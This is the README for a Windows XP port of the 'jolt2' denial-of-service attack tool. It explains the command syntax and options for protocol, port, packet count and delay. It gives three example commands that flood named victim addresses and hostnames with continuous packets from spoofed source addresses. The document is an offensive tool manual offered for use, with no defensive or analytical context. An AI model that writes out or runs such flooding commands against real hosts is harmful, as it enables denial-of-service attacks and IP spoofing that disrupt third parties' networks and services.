
  jolt2 Attack Version 1.3
  ========================

  This program is the port of jolt2 attack to Windows XP.

  Note: This program is only tested on Windows XP.


  I. USAGE
  ========================

  jolt2.exe <victim> <spoof host> [options]

  Options:
    -P:   Protocols to use. Either icmp, udp or both  (default icmp)
    -p:   Dest port                                   (default 7)
    -n:   Num of packets to send                      (0 is continuous (default))
    -d:   Delay (in ms)                               (default 0)


  Example I: jolt2 217.155.32.170 40.41.42.43

  On this attack:

  - Victim: 217.155.32.170
  - Source IP: 40.41.42.43
  - Protocol: ICMP
  - Destination Port: not used on icmp
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)


  Example II: jolt2 www.xnet.org 44.45.46.47 -P udp -p 42

  On this attack:

  - Victim: www.xnet.org
  - Source IP: 44.45.46.47
  - Protocol: UDP
  - Destination Port: 42
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)


  Example III: jolt2 www.xnet.org www.beginner.vg -P both -p 53

  On this attack:

  - Victim: www.xnet.org
  - Source IP/host: www.beginner.vg
  - Protocol: ICMP + UDP
  - Destination Port: 53 (for udp packets)
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)


  II. CONTACT
  ========================
  MSN: metinsdr@hotmail.com
  UIN: 470734

